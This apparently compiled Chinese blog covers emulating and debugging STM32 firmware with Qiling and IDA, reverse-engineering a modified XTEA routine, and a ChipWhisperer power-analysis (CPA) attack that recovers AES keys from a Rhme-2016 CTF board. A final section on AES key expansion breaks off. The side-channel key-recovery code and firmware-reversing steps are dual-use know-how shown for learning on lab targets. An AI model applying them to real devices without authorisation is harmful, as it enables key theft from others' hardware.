• 这个也是老早之前发在看雪上的帖子，原帖地址: https://bbs.kanxue.com/thread-274828.htm
• 以下开始为原贴内容

前言

• 实际分析嵌入式固件过程中，经常会遇到各种非Linux和非常见系统的固件，这类固件往往就是一个"裸"的二进制程序，而不像ELF和PE这些有特定结构的可执行程序，对于这类固件往往很难对它进行动态调试，而只能静态分析。最近一段时间，学习了很强大的Qiling框架，它除了可以模拟运行各种可执行程序，还提供了Debugger接口，于是乎我就想着能不能用Qiling配合IDA动态调试固件。遗憾的是网上关于Qiling的教程大部分都是模拟ELF和PE这些相对来说比较标准的程序，而模拟像这种就一个"裸"的二进制程序的资料却很少，这里分享下我的摸索过程

• 关于Qiling和Unicorn这里就不多介绍了，详见官网

  • Qiling官网: https://qiling.io/

  • Unicorn官网: https://www.unicorn-engine.org/

• 下面以我上个帖子 一个简单的STM32固件分析 用到的固件stm32f103RCT6.bin来介绍如何用Qiling框架模拟运行指定函数并启用Debugger，然后使用IDA进行动态调试

开始

• 首先时qiling官方github的有一个example引起了我的注意，如下图，qiling的示例有一个模拟arm下的uboot。uboot据我所知是一个bootloader，它在固件中就是一个"裸"的二进制程序，于是这里面可能就有我想要的样例

  

• 查看hello_arm_uboot.py代码，一直拉到最后，如下图，这部分代码就是模拟运行"裸"的二进制程序的一个例子

  

• 接下来就是照猫画虎，仿照着这个来尝试模拟运行stm32f103RCT6.bin固件中的XTEA函数。这里简单介绍下这个stm32f103RCT6.bin固件，它的加载基地址为0x8000000，从前一篇的分析可以知道它在地址0x800E288有个XTEA函数，这个函数就是接下来需要模拟调试运行的函数

  

• 首先是导入qiling和unicorn的包

  1 2 3 4 5

  from qiling.core import * from qiling.const import * from qiling.os.const import * from unicorn.arm64_const import * from unicorn import *

• 对照代码样例，读入需要模拟的固件

  1 2 3

  filepath='stm32f103RCT6.bin' with open(filepath, 'rb') as fp: fw = fp.read()

• 接下来看原代码的Qiling对象生成方式，第一个code=uboot_code[0x40:]，剔除了前0x40字节的原因应该是，uboot固件的前0x40字节不加载进内存，这里的stm32固件是整个都加载进内存的，所以可以直接传整个读入的fw。有个参数需要注意的是profile="uboot_bin.ql"，看起来是还有一个配置文件"uboot_bin.ql"

  

• 在同级目录下，可以找到这个uboot_bin.ql，那么接下来，需要简单理解下这个配置文件的各个参数的意义

  

• 源码中搜索"heap_size"，如下图，可以在qiling/loader/blob.py中找到关于这几个参数的含义

  

• 根据上面代码可画出下图内存映射，"entry_point"这里为内存加载地址"load_address"而不是代码入口点，Qiling会根据entry_point和ram_size大小分配一块内存，然后将代码code写入，需要注意的是默认初始栈寄存器SP指向这块内存end_address - 0x1000的位置，如果模拟运行前不做修改，需要将ram_size预留出一定的栈空间的大小，不然往栈内存写数据时会覆盖code内存数据。堆内存heap的起始地址就是entry_point + ram_size，下图虚拟线表示默认不会直接映射堆内存，如果需要使用这块内存，需要先执行ql.os.heap.alloc(size)来使用

  

• 接下来就可以生成配置文件了，代码如下

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29

  # 加载地址 load_addr=0x8000000 # 栈大小 stack_size = 0x20000 # 堆大小 heap_size = 0x20000 # 计算固件大小 0x1000对齐 fw_size = math.ceil(len(fw)/0x1000)*0x1000 # 初始分配的内存大小包括 固件和栈空间大小，+0x1000是为了使可用的栈大小与stack_size保持一致 ram_size = fw_size + stack_size + 0x1000 cfg_str = f""" [CODE] ram_size = {ram_size} entry_point = {load_addr} heap_size = {heap_size} [MISC] current_path = / """ # 保存配置文件 with open('ql-config.ql', 'w') as fp: fp.write(cfg_str)

• 接着，仿照样例生成Qiling对象，代码如下，因为这里模拟运行的用到了thumb指令，所以需要指定参数thumb=True。因为这里默认模拟的是小端序，而固件恰好是小端序固件，所以可以不指定端序，但是如果模拟的为大端序的固件，则需要指定参数endian=QL_ENDIAN.EB。更多参数用法详见官方文档

  1	ql = Qiling(code=fw, archtype="arm", ostype="blob", profile="ql-config.ql", thumb=True)

• 定义模拟运行的起始地址和终止地址，这里因为只模拟运行sub_800E288函数，所以设为sub_800E288函数起始地址和终止地址即可

  1 2	begin =0x800E288 end = 0x800E296

  

• 因为模拟的sub_800E288函数有3个参数，所以还需要给函数传参

  

• 这里简单介绍下ARM中常见的函数传参规范：对于函数参数不超过4个参数时用r0，r1，r2，r3寄存器来传参，对于函数参数超过4个参数时，前4个依旧用r0，r1，r2，r3寄存器传参，往后的参数以压入栈的方式传参。类似地函数如果有返回值，约定以r0寄存器返回。这些规范主要是为了不同程序或模块之间相互调用各自的函数而不出错，因为是规范，所以也就可以不遵循这个规范，比如说你自己用汇编写的程序的话，想怎么传参就怎么传参，只要你自己不限入混乱，程序不出错即可。

• 废话不多说，回到正题，这里获取unicorn对象来为函数传参（unicorn对象可以读写各个寄存器）。从上面可知，需要模拟的函数的3个参数都是指针，所以需要给r0，r1，r2 这3个寄存器写入3个内存地址，而初始SP寄存器（栈寄存器）和heap之间有块0x1000的内存没有用到，因此这里可以用sp+0x100，sp+0x200，sp+0x300，这3个地址作为函数参数传入。不过单单将3个地址写入r0，r1，r2寄存器还不够，还要在相应地内存写入数据，这样才是完整的传参过程。因为第3个参数是加密结果的输出，所以可以不往该地址写数据。如下代码，为r0传入密钥"BA 2F 96 A9 BA 2F 96 A9 BA 2F 96 A9 BA 2F 96 A9"，为r1传入明文"10 BE 62 F8 E8 DC 34 46"

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

  sp = ql.arch.regs.sp uc=ql.uc #为第1个参数key传参 uc.reg_write(UC_ARM_REG_R0, sp+0x100) uc.mem_write(sp+0x100, bytes.fromhex("BA 2F 96 A9 BA 2F 96 A9 BA 2F 96 A9 BA 2F 96 A9")) #为第2个参数in传参 uc.reg_write(UC_ARM_REG_R1, sp+0x200) uc.mem_write(sp+0x200, bytes.fromhex("10 BE 62 F8 E8 DC 34 46")) #为第3个参数out传参 uc.reg_write(UC_ARM_REG_R2, sp+0x300)

• 然后是启用debugger，Qiling默认是不启用debugger的，如下代码，启用gdb debugger并监听相应IP和端口。详细说明见官方文档：https://docs.qiling.io/en/latest/debugger/

  1	ql.debugger = 'gdb:0.0.0.0:9999'

• 在qiling-1.4.4中，设置了debugger后且ostype为"blog"的情况下，直接运行ql.run会报"AttributeError: 'QlOsBlob' object has no attribute 'fs_mapper'"错

• 在源码中找到了相应的描述，如下图，QlOsBlob类中有几个函数还没有实现，详见：qiling/os/blob/blob.py

  

• 不过好在，经过测试，在执行ql.run之前，可以按以下方式，规避下这个问题。这段代码作用很简单，就是给个空壳给ql.os.fs_mapper。Python一个非常好的特性就是可以像下面这样，可以很容易地对各种库进行动态修改，而不用去修改库的原文件。下面这部份代码，等以后Qiling有相应的函数实现后就不在需要了

  1 2 3 4 5

  class MyMapper: def add_fs_mapping(self, ql_path, real_dest): pass ql.os.fs_mapper = MyMapper()

• 重新运行后，出现如下信息，说明成功模拟运行，并启用了debugger并监听了相应的IP和端口。需要注意的是，如果在生成Qiling对象是指定了参数verbose=QL_VERBOSE.OFF，那么运行时不会有任何log信息

  

• 接下来，介绍IDA中如何连接到这个server进行动态调试

• IDA中选择Debugger > Select debugger或者快捷键F9，选择Remote GDB debugger

  

  

• 选择Debugger > Process options

  

• 输入运行Qiling机器的IP和端口，如果运行Qiling和IDA是同一机器同一系统内，则IP填127.0.0.1即可

  

• 接着选择Debugger > Debugger options

  

• 勾选如下两个即可

  

• 然后选择Debugger > Manual memory regions

  

• 按照下图，新建几个内存映射，否则调试时，IDA可能不能跳转到栈内存中，也不能查看栈内存的数据

  

• 这里选择添加两个映射分别是栈内存和栈内存到堆内存之间的一小部分，堆内存（heap）因为这里没有用到，所以可以省略，code因为IDA分析的固件就是这部分内存，所以也可以省略

  

• 最后选择Debugger > Attach to process，会出现一个PID为0的进程，点击OK即可

  

  

• 最后如下图可以看到，IDA进入了调试模式，且停在sub_800E28函数开始的位置，接下来就可以使用IDA进行动态调试了

  

• 调试结束后，可以回到Qiling中，读取相应地址的结果。从我上一个帖子可知预期的密文为"8C 79 F5 D1 5E A9 46 2D"，如下图，输出与预期一致

  1	ql.mem.read(sp+0x300, 8).hex()

  

最后

• 本文只是简单介绍了qiling的一些基本用法，关于qiling更多用法详见官方文档：https://docs.qiling.io/en/latest/
• 本文并没有过多介绍unicorn的用法，关于unicorn的用法可以参看官方文档：https://www.unicorn-engine.org/docs/，还有论坛的这两个帖子：利用unicorn分析固件中的算法 ，Unicorn 在 Android 的应用
• 实际上对于STM32 mcu的模拟可能并不需要那么繁琐，官方有相应的模拟示例，详见：https://github.com/qilingframework/qiling/tree/master/examples/mcu，本文的这种方法主要是用来模拟那些qiling官方还不支持的固件，只不过例子是stm32的固件而已
• 本文完整代码包含在附件之中

2022-10-27更新

• qiling模拟thumb时，IDA下断点，停不下来，原因是IDA下的断点地址没有+1，但是qiling判断时却将当前地址+1了

• 执行ql.run之前加入以下代码，可以动态解决这个问题，下面代码作用相当于注释掉qiling/debugger/gdb/utils.py中dbg_hook函数的前两行代码。同样地，待qiling后续版本修复这个问题后就不再需要这部分代码了

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61

  import types def dbg_hook(self, ql, address: int, size: int): #if ql.arch.type == QL_ARCH.ARM and ql.arch.is_thumb: # address += 1 # resuming emulation after hitting a breakpoint will re-enter this hook. # avoid an endless hooking loop by detecting and skipping this case if address == self.last_bp: self.last_bp = None elif address in self.bp_list: self.last_bp = address ql.log.info(f'gdb> breakpoint hit, stopped at {address:#x}') ql.stop() # # TODO: not sure what this is about # if address + size == self.exit_point: # ql.log.debug(f'{PROMPT} emulation entrypoint at {self.entry_point:#x}') # ql.log.debug(f'{PROMPT} emulation exitpoint at {self.exit_point:#x}') def run(self, begin: Optional[int] = None, end: Optional[int] = None, timeout: int = 0, count: int = 0): """Start binary emulation. Args: begin : emulation starting address end : emulation ending address timeout : limit emulation to a specific amount of time (microseconds); unlimited by default count : limit emulation to a specific amount of instructions; unlimited by default """ # replace the original entry point, exit point, timeout and count self.entry_point = begin self.exit_point = end self.timeout = timeout self.count = count # init debugger (if set) debugger = select_debugger(self._debugger) if debugger: debugger = debugger(self) debugger.gdb.dbg_hook = types.MethodType(dbg_hook, debugger.gdb) # patch binary self.do_bin_patch() if self.baremetal: if self.count <= 0: self.count = -1 self.arch.run(count=self.count, end=self.exit_point) else: self.write_exit_trap() # emulate the binary self.os.run() # run debugger if debugger and self.debugger: debugger.run()

附件

• qiling-example.zip

• 这个是老早之前发在看雪上的帖子，原帖地址: https://bbs.kanxue.com/thread-274788.htm
• 以下开始为原贴内容

前言

• 看完论坛的 STM32固件逆向 帖子后，又在评论区发现这个求助贴 stm32芯片程序有xtea加密算法，但是数据排序的问题研究不明白 ，于是想着分析分析练练手

  

• 根据求助贴内容，概括下有用的信息

  • 一个名为stm32f103RCT6.bin的固件，从固件名可以得知MCU型号为stm32f103RCT6

  • MCU与设备A通信时用到了XTEA加密

  • MCU注册时用到的密钥为 BA2F96A9

  • MCU与设备A通信时的两个加密样例如下

    1 2 3 4 5 6 7 8 9

    明文1 10 BE 62 F8 E8 DC 34 46 密文1 8C 79 F5 D1 5E A9 46 2D 明文2 0E 77 50 C8 C6 27 E1 BF 密文2 36 0A 1A 6E 6E FE F0 84

• 接下来目标就是根据上面信息，找到加密函数，还原加密过程

开始

• 首先用IDA打开stm32f103RCT6.bin文件，选择ARM小端序，然OK进入即可

  

• 直接以Binary file打开，可以看到，IDA没有识别出任何函数

  

• 习惯性的把前几个字节"D"三下，如下图，可以大胆的猜测加载基地址为0x8000000，事实上也确实如此，当然可以根据MCU型号stm32f103RCT6去查datasheet。不过更多确定基地址的方法请参考论坛的这个帖子 固件安全之加载地址分析 ，里面详细介绍了多种方法来确定基地址，这里就不再赘述了

  

• Edit > Segments > Rebase program... 重设基地址为0x8000000，设置好基地址后，就已经往成功路上迈向一大步了

  

• 接下来，Alt + L从前面几个地址之后开始选择，一直到末尾，右键选择"Analyze selected area"

  

  

• 出现下面提示框，选择Analyze，然后静待IDA分析过程结束

  

• 这时候，可以看到，IDA已经识别出许多函数了

  

• 接下来使用Findcrypt插件搜索加密常量，看看有没有什么发现，Search > Find crypto constants，如下图，可以看到，有个TEA的delta加密常量，这正好对应前面提到的MCU通信时使用了XTEA加密

  

• 跟踪查看引用该常量的sub_800E288函数，F5结果如下图所示

  

• 对比网上的XTEA加密C代码，可以知道，sub_800E288函数的参数从左到右为，加密密钥、加密输入、加密输出

  

• 对照上面XTEA加密C代码，就可以对一些变量重命名了，如下图所示，可以看到，加密时的密钥输入并不直接作为XTEA加密的密钥，而是经过了一些运算进行了变换

  

• 接下来详细分析加密过程，首先时最前面的这部分，存在大量的 左移24、左移16和左移8，熟悉的朋友可能很快就反应过来，这个是大小端转换。所谓大小端指的是"大端序"（BigEndian）和"小端序"（LittleEndian）。用一句话来说"大端序"就是高位在前，低位在后，"小端序"就是低位在前，高位在后。举个简单例子对于同一个4字节的byte数组"12 34 56 78"，在大端序里面把它当成4字节的int的话它就是0x12345678，而在小端序里面把它当成4字节的int的话它就是0x78563412了。下面的"<<24 <<16 <<8"作用就是用来将4个byte的数组转为大端序的整数（MCU是小端序的，直接用*(int *)类型强转的话得到的结果就是一个小端序的int）

  

• 忽略左移24、左移16和左移8这些端序转换的部分，我们能发现，其实对于输入in在正式XTEA加密前没有做任何特殊处理，而对于密钥的每一个字节则与一些常量进行了异或处理。同样地，看到"0x66、0x6F ..."，这些值熟悉的情况下，很容易反应过来，这些可能是ASCII码

  

• TAB键切换查看反汇编代码，如下图，可以看到这些常量都是基于地址0x8030A30开始的偏移量

  

• 查看0x8030A30地址，"A"一下，可以得到一个字符串，如下图所示，看得出来这是个有故事的字符串

  

• 回到反编译代码窗口，重新F5一下，可以看到，反编译代码更清晰明了了，密钥在用于XTEA加密之前，每个字节会与上面的字符串相对应的字节进行异或处理

  

• 再来看后面这部分，如下图，后面的其实就是标准XTEA加密，只不过对于加密结果的输出，同样有大小端的转换，"HIBYTE(x) BYTE2(x) BYTE1(x)"与上面的"<<24 <<16 <<8"一样，常见于数据大小端转换

  

• 到这里就结束了吗？- 答案是还没有，求助贴里面提到的MCU注册密钥是"BA2F96A9"，只有4个字节大小的密钥，但是这个加密函数的密钥输入却有16个字节，所以从MCU注册密钥"BA2F96A9"到加密密钥userKey中间还有一些过程需要去分析

• 对 sub_800E288 "X"一下，查看sub_800E288函数的交叉引用，如下图，可以看到只有一处调用

  

• 查看该调用，如下图，可以看到第一个参数加密密钥是以地址0x20000104传入的，所以加密密钥就储存在0x20000104地址处，接下来只要查看哪些函数有往0x20000104地址写数据，即可找到密钥变换的函数

  

• 接下来Text Serach搜索0x20000104，看哪些函数使用了0x20000104地址

  

• 如下图，搜索的结果并不多，挨个查看后，可以看到只有sub_800F3C8函数中有往0x20000104地址写数据的代码，而且sub_800F3C8函数参数为unsigned int类型（刚好是4个字节大小），所以基本上可以确定这个函数就是MCU注册时的密钥变换为加密密钥的函数

  

  

• 接下来将sub_800F3C8和sub_800E288这两个函数反编译伪代码提取出来，用VS Code简单写个程序验证下，代码如下

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91

  #include <stdio.h> #include "defs.h" void keyExpand(unsigned int key, _BYTE *outKey); void XTEA(_BYTE *userkey, _BYTE *in, _BYTE *out); void keyExpand(unsigned int key, _BYTE *outKey) { int i; // r0 for ( i = 0; i < 16; i = (i + 1) ) *(i + outKey) = key >> (8 * (3 - i % 4)); } void XTEA(_BYTE *userkey, _BYTE *in, _BYTE *out) { unsigned int v3; // r3 unsigned int v4; // r4 unsigned int v5; // r5 unsigned int i; // r6 int v7[4]; // [sp+0h] [bp-34h] unsigned int v8; // [sp+10h] [bp-24h] unsigned int v9; // [sp+14h] [bp-20h] char aStefanlovesmay[] = "StefanLovesMaya!"; if ( userkey !=0 && in!=0 && out!=0 ) { v8 = (*in << 24) + (in[1] << 16) + (in[2] << 8) + in[3]; v9 = (in[4] << 24) + (in[5] << 16) + (in[6] << 8) + in[7]; v7[0] = (userkey[3] ^ aStefanlovesmay[3]) + ((*userkey ^ aStefanlovesmay[0]) << 24) + ((userkey[1] ^ aStefanlovesmay[1]) << 16) + ((userkey[2] ^ aStefanlovesmay[2]) << 8); v7[1] = (userkey[7] ^ aStefanlovesmay[7]) + ((userkey[4] ^ aStefanlovesmay[4]) << 24) + ((userkey[5] ^ aStefanlovesmay[5]) << 16) + ((userkey[6] ^ aStefanlovesmay[6]) << 8); v7[2] = (userkey[11] ^ aStefanlovesmay[11]) + ((userkey[8] ^ aStefanlovesmay[8]) << 24) + ((userkey[9] ^ aStefanlovesmay[9]) << 16) + ((userkey[10] ^ aStefanlovesmay[10]) << 8); v7[3] = (userkey[15] ^ aStefanlovesmay[15]) + ((userkey[12] ^ aStefanlovesmay[12]) << 24) + ((userkey[13] ^ aStefanlovesmay[13]) << 16) + ((userkey[14] ^ aStefanlovesmay[14]) << 8); v3 = v8; v4 = v9; v5 = 0; for ( i = 0; i < 0x20; ++i ) { v3 += (((16 * v4) ^ (v4 >> 5)) + v4) ^ (v7[v5 & 3] + v5); v5 -= -0x9E3779B9; v4 += (((16 * v3) ^ (v3 >> 5)) + v3) ^ (v7[(v5 >> 11) & 3] + v5); } *out = HIBYTE(v3); out[1] = BYTE2(v3); out[2] = BYTE1(v3); out[3] = v3; out[4] = HIBYTE(v4); out[5] = BYTE2(v4); out[6] = BYTE1(v4); out[7] = v4; } } int main() { unsigned int key=0xBA2F96A9; _BYTE outKey[16]; keyExpand(key, outKey); printf("outKey: "); for (int i=0; i<16; i++) { printf("%02x ", outKey[i]); } printf("\n"); // _BYTE in[] = {0x10, 0xBE, 0x62, 0xF8, 0xE8, 0xDC, 0x34, 0x46}; _BYTE in[] ={0x0E, 0x77, 0x50, 0xC8, 0xC6, 0x27, 0xE1, 0xBF}; _BYTE out[8]; printf("in: "); for (int i=0; i<8; i++) { printf("%02x ", in[i]); } printf("\n"); XTEA(outKey, in, out); printf("out: "); for (int i=0; i<8; i++) { printf("%02x ", out[i]); } return 0; }

• 输出结果，如下图所示，下面输出结果用到例子为上面样例的第2组数据（使用第1组效果也一样），可以看到加密结果与预期一致，至此，成功还原了整个XTEA加密过程

  

最后

• 如您觉得本文内容侵犯了您的利益，请联系作者或者管理删除！

附件

• stm32-re.zip

• 最近入手了ChipWhisperer的CW308 的底板，方便进一步学习侧信道攻击，详见官网介绍：https://rtfm.newae.com/Targets/CW308 UFO/

  

• 有了底板之后就可以自从官方的github仓库中 https://github.com/newaetech/chipwhisperer-target-cw308t 获取pcb源码，自己打板制作更多的目标板了，打板pcb可以白嫖嘉立创，每月两次免费打板机会（规则貌似是：如果上月消费<20，那么两次免费打板仅限于立创EDA的工程文件，上月消费>=20，那么免费打板没有这个限制，具体以官方说明为准）

• 虽然嘉立创免费打板可能要受限于要立创EDA设计，但是基于ChipWhisperer开源的Altium Designer的工程文件和原理图，还是可以自己将AD工程移植为立创EDA工程

CW308T_AVR使用

• 照着官方的原理图和实物图 https://github.com/newaetech/chipwhisperer-target-cw308t/tree/main/CW308T_AVR，自己用立创EDA也画了个CW308T_AVR，然后白嫖了一波嘉立创。之所以选AVR这个，是因为这个工程足够简单，元器件和导线数就没多少，适合像我这样不懂pcb设计的萌新。此外，还有另外一个原因是：之前用面包板和atmega 328p搭了个arduino最小系统去解一道硬件CTF题，虽然当时成功了，但是抓取的波形属实难看的离谱，想看看用CW308T_AVR去解那道题会有什么效果

• 下图为官方CW308T_AVR实物图，基本上没多少元器件，也就4个电阻和3个电容还有一个atmega328p

  

• 在移植CW308T_AVR过程中，才发现原来atmega328p 3.3v供电也可以正常运行，只不过时钟频率需要变为8mhz，而16mhz对应的为5v电压

• 在反复查看官方原理图过程中，也终于明白，在给Vcc串联一个电阻后是怎么测电压的，实际上也并没有直接测串联的小电阻两端的电压，而是相当于测atmega328p两端的电压，这样也就避免了因为共地直接测电阻两端电压会导致短路的问题，官方原理图如下

  

  

• 接下来以官方的这个jupyter notebook https://github.com/newaetech/chipwhisperer-jupyter/blob/master/courses/sca101/Lab%205_1%20-%20ChipWhisperer%20CPA%20Attacks%20in%20Practice.ipynb 为例，摸索CW308T_AVR的使用方法

• 首先是PLATFORM选择问题，经过测试应该选'CW301_AVR'，而不是'CW308_AVR'（没有这个）

  1 2 3 4

  SCOPETYPE = 'OPENADC' PLATFORM = 'CW301_AVR' CRYPTO_TARGET='TINYAES128C' SS_VER='SS_VER_1_1'

• 编译方面保持原来的即可

  1 2 3

  %%bash -s "$PLATFORM" "$CRYPTO_TARGET" "$SS_VER" cd ../../../hardware/victims/firmware/simpleserial-aes make PLATFORM=$1 CRYPTO_TARGET=$2 SS_VER=$3

• 然后就是第一个坑了，这里不能再选%run "../../Setup_Scripts/Setup_Generic.ipynb"，而是应该选%run "../../Setup_Scripts/Setup_Notduino.ipynb"，原因是Setup_Generic.ipynb中没有关于AVR的配置，如下图

  

• 实际上Setup_Notduino.ipynb中主要起作用的就是下图部分

  

• 接着添加以下代码（也可添加在Setup_Notduino.ipynb中），不然，后面烧录编译后的文件到目标板时，会问题

  1	prog = cw.programmers.AVRProgrammer

• 烧录编译的固件，出现Verified flash OK则为正常

  1 2 3

  # If you need to program - run this fw_path = '../../../hardware/victims/firmware/simpleserial-aes/simpleserial-aes-{}.hex'.format(PLATFORM) cw.program_target(scope, prog, fw_path)

  

• 接着修改，samples数和偏移如下

  1 2	scope.adc.samples=4000 scope.adc.offset=0

• 动态画图

  1 2	%run "../../Helper_Scripts/plot.ipynb" plot = real_time_plot(plot_len=24000)

• 抓取波形

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23

  import time from tqdm import tnrange ktp = cw.ktp.Basic() #Set your project name here project = cw.create_project("projects/lab51_examplecpa", overwrite = True) #Set your number of traces here num_traces = 250 for i in tnrange(num_traces, desc='Capturing traces'): key, text = ktp.next() # manual creation of a key, text pair can be substituted here trace = cw.capture_trace(scope, target, text, key) if trace is None: continue project.traces.append(trace) #Send every 10th trace? if i % 10 == 0: plot.send(trace) time.sleep(0.1) project.save()

• 如下图，可以看到，官方的例子，抓取的波形还是很清晰明了的

  

• 最后也成功恢复出了AES密钥，实际上这里只需抓取25条能量迹就可以恢复出AES密钥而不用250条

  1 2 3 4 5

  import chipwhisperer.analyzer as cwa #pick right leakage model for your attack leak_model = cwa.leakage_models.sbox_output attack = cwa.cpa(project, leak_model) results = attack.run(cwa.get_jupyter_callback(attack))

  

• 用官方例子验证完目标板没有问题后，就尝试用来解之前硬件CTF Rhme-2016的piece_of_scake题，详见：https://github.com/Riscure/Rhme-2016

• 烧录piece_of_scake固件

  1 2 3

  # If you need to program - run this fw_path = 'Rhme-2016/challenges/binaries/piece_of_scake/piece_of_scake.hex' cw.program_target(scope, prog, fw_path)

  

• 设置串口波特率，貌似piece_of_scake.hex固件中是按16mhz编译的，而实际在ChipWhisperer中，时钟频率为7384615，然后就导致串口波特率还有休眠函数delay变慢了，需要重新计算波特率，公式：7.38mhz/16mhz * orgin_baud

  1	target.baud=7384615.384615385/16000000*19200

  

• 事实上实际波特率，还可以先烧一个不断往外发串口信息的固件，然后用逻辑分析仪，抓取波形，计算得到。下图为烧录一个以19200波特率不断往外发数据的arduino程序，实际波特率计算方式，寻找间距最小的峰，下图最小间距的峰为112.667us，所以频率为1 / 112.667 * 1e6 = 8875.7 bps

  

• chipwhisperer官方中也有提到类似的问题 https://forum.newae.com/t/cw1173-errortarget-did-not-ack/1757/3

  

• 设置好正确波特率后，就可以与atmega328p正常通信了，按找'e'+16个字节数据的方式即可进行加密，这里可以用chipwhipserer的target.write函数来发送串口信息，不过有个问题是chipwhisperer的target.read函数返回的为str类型而不是bytes类型，导致乱码，直接用encode也不能得到正确的bytes数组，所以最后用一个usb转串口来配合串口通信

  

• 同样波特率需要重新计算，将usb转串口的Rx、Tx接到CW308T底板上的Rx和Tx即可

  1 2 3

  from serial import Serial import time s=Serial('/dev/cu.wchusbserial1410', baudrate=7384615.384615385/16000000*19200)

  

• 此时，可以正确获得加密后的结果，这里之所以不用usb转串口发送数据，而是还是使用chipwhisperer发送数据的原因是，usb转串口发送的数据，atmega328p没有返回（原因未知），所以这里一个发一个接收正好互补（原因应该是Rx和Tx接反了，CW308T底板的Rx Tx是atmega328p的Rx Tx而不是cwlite攻击板的Rx Tx，所以正确接法是usb转串口的Rx接CW308T底板的Tx，Tx接Rx）

  

• 接着设置采样samples数，还有触发信号引脚设为tio4，同时：chipwhisperer中用一根杜邦线将GPIO4（10）和SCK（12）连在一起，这样原因是SCK（12）连接的是atmega328p的19引脚，而之前的分析中，AES加密前会在19引脚有信号输出

  1 2 3 4 5

  scope.adc.samples=24000 scope.clock.adc_src='clkgen_x4' scope.adc.offset=0 scope.adc.presamples=0 scope.trigger.triggers = "tio4"

  

• 动态画图

  1 2	%run "../../Helper_Scripts/plot.ipynb" plot = real_time_plot(plot_len=24000)

• 仿照官方例子，可以实现以下抓取波形代码

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36

  from tqdm import tnrange import numpy as np import time ktp = cw.ktp.Basic() key, text = ktp.next() # key=bytes([0]*16) key=bytes([0xaf, 0x23, 0xd5, 0x45, 0xa0, 0xea, 0xe6, 0xa0, 0x74, 0x65, 0x96, 0xca, 0xce, 0x51, 0xf0, 0xf7]) target.simpleserial_write('k', key) trace_array = [] textin_array = [] textout_array=[] proj = cw.create_project("projects/piece_of_scake", overwrite=True) N = 50 for i in tnrange(N, desc='Capturing traces'): scope.arm() target.write(b"e"+bytes(text)) ret = scope.capture() r=s.read_all() while len(r)==0: r=s.read_all() if ret: print("Target timed out!") continue trace = scope.get_last_trace() if i % 10 == 0: plot.send(trace) print(r.hex()) trace_array.append(trace) proj.traces.append(cw.common.traces.Trace(trace, text, r,key)) textin_array.append(text) key, text = ktp.next() proj.save()

• 效果如下，这里波形中不能很明显看出AES的位置，可能还是时钟频率不一致导致的

  

• 按如下更改采样参数后，可以抓到如下的波形图，可以看到有几个差不多的峰形，推测就是AES的每轮循环

  1 2	scope.adc.samples=24000 scope.clock.adc_src='clkgen_x1'

  

• 放大第一个峰形状的结果如下，看起来效果还不错

  

• 最后按如下修改参数，因为第一个峰结束位置差不多就在6-7000附近，当然保持24000也可，但计算会变慢，而且效果会变差些

  1	scope.adc.samples=8000

  

• 最后，如下图，可以看到只需很少能量迹，实际上25条就可以恢复出AES密钥，比之前在面包板上的方式（500条）要少得多

  

总结

• 通过移植CW308T_AVR和使用CW308T_AVR解CTF题过程中，对侧信道攻击有了进一步了解，也对ChipWhisperer的用法有了进一步了解

• 最近实际逆向过程中，经常会遇到AES算法，而且有时也会遇到一些非标准AES或者魔改的AES

• 本着进一步了解AES算法的态度，决定结合网上各种资料，自己动手实现一次AES加解密，加深自己对AES的了解

• 当然网上有很多优秀的AES实现了，其中最著名的当属：openssl，openssl包含非常多的密码学算法的实现，而且很多都是性能优化后的实现。一个比较小巧的c语言实现是：https://github.com/kokke/tiny-AES-c

• python的一些AES实现:

  • https://gist.github.com/raullenchai/2920069

  • https://github.com/hlilje/aes-python.git

• 这里再介绍一下python的：pycryptodome库，这个虽然是python库，但底层算法是c写的，所以性能上是非常不错的，可以安装这个库替换python的Crypto库，也可以与Crypto共存。这个库可以作为python中各种加密算法的标准库来使用。

• 因为这里是以学习为目的，所以本文不考虑任何性能上的问题

开始

• AES算法总体上可以分为两部分去实现，一部分是：密钥扩展，另一部分是：加解密逻辑

• 下面首先来实现密钥扩展，这个连接有AES密钥扩展的详细介绍https://www.brainkart.com/article/AES-Key-Expansion_8410/

• 下面盗用上面提到链接中的两张图，第一张图是AES密钥扩展的实现伪代码实现，第二张图为AES密钥扩展的流程图

  

  

• 下面来解析这两张图，首先看图中的这一部分，这张图什么意思呢？这张图表示，将密钥划分为4x4的矩阵，需要注意的点是这个密钥是以列为主顺序(Column-major order)的矩阵，而不是以行为主顺序(Row-major order)的矩阵，这两种矩阵相互转化的实际上就是矩阵转置。密钥的每一列记为w0，w1， w2， w3（w代表word，32位即4字节整数，w0 ... w3视为一个word类型数组）

  • 题外话：像c语言中的二维数组就是以行为主顺序的，不注意这个的话，可能最后实现的"AES"是非标准的AES。实际逆向工作中就有遇到过，密钥和数据输入输出都没转置的情况，如果遇到这种"AES"，如何使用标准AES去实现呢？很简单，只需将密钥、输入、输出都进行矩阵转置即可

  

• 接着来看这部分，这张图又代表什么含义呢？先不看w4，只看w5，w6，w7，可以看到w5 = w1 xor w4，w6 = w2 xor w5， w7 = w3 xor w6 即（wi = wi-4 xor wi-1）。再来看w4部分，下图w3指出的g代表使用g函数处理w3，所以w4 = w0 xor g(w3)。就这样依次类推，以后的w8，w9 ... wi都是这么生成的（其中如果i为4的倍数，则wi-1需要先经过g函数处理后再与wi-4进行异或）

  

• 接着看下面这部分，下图即为上面提到的g函数，这个g函数可以拆分成3部分来看

  

• 首先是下图这个，下图这个代表将word类型循环左移1位如：第0个字节移到最后一位，其余3字节往左移动1位

  

